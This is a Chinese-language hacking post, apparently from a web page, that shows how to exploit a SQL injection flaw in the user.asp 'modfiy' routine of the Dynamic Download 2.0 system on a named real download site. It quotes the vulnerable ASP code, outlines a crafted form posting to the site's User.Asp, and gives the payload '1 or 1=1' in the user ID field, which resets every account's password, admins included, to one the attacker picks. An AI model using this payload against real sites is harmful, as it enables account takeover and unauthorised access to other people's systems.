国内比较有名气的嬴政下载官方网站采用的是动感下载2.0系统,
但user.asp未对modfiy函数作用户验证
所以我们可以修改管理员密码
如下:
sub modfiy() ’ ==========================保存修改================================
set rs=server.createobject("adodb.recordset")
sql="select * from Admin_UserInfo where UserName=’"&UserName&"’ and UserID="&request.form("UserID")&" and CategoryName=’"&CategoryName&"’"
rs.open sql,conn,1,3
msgtitle="修改信息"
if not(rs.eof and rs.bof) then
rs("PassWord")=md5(Checkstr(Trim(Request.Form("PassWord"))))
rs("Email")=Trim(Request.Form("Email"))
rs.update
msginfo="
修改成功!
登录系统
返回首页"
else
msginfo="
修改失败!"
end if
rs.close
set rs=nothing
call Sysmsg(msgtitle,msginfo)
end sub
所以我们构造一个网页提交修改:
http://soft.winzheng.com/User.Asp">
用户注册
用户id:
*
(2-12位 数字、大小字字母、“_”或者“-”)
用户名:
*
(2-12位 数字、大小字字母、“_”或者“-”)
密 码:
*
密码问题:
*
忘记密码的提示问题
密码答案:
*
忘记密码的提示问题答案,用于取回用户密码
真实姓名:
*
邮箱地址:
*
联系
QQ:
联系地址:
*
联系电话:
*
然后在用户id那儿填写 1 or 1=1
添上密码,所有用户的密码都被修改成你的密码了。
设为首页
加入收藏
联系我们
您当前的位置:
减小字体
增大字体
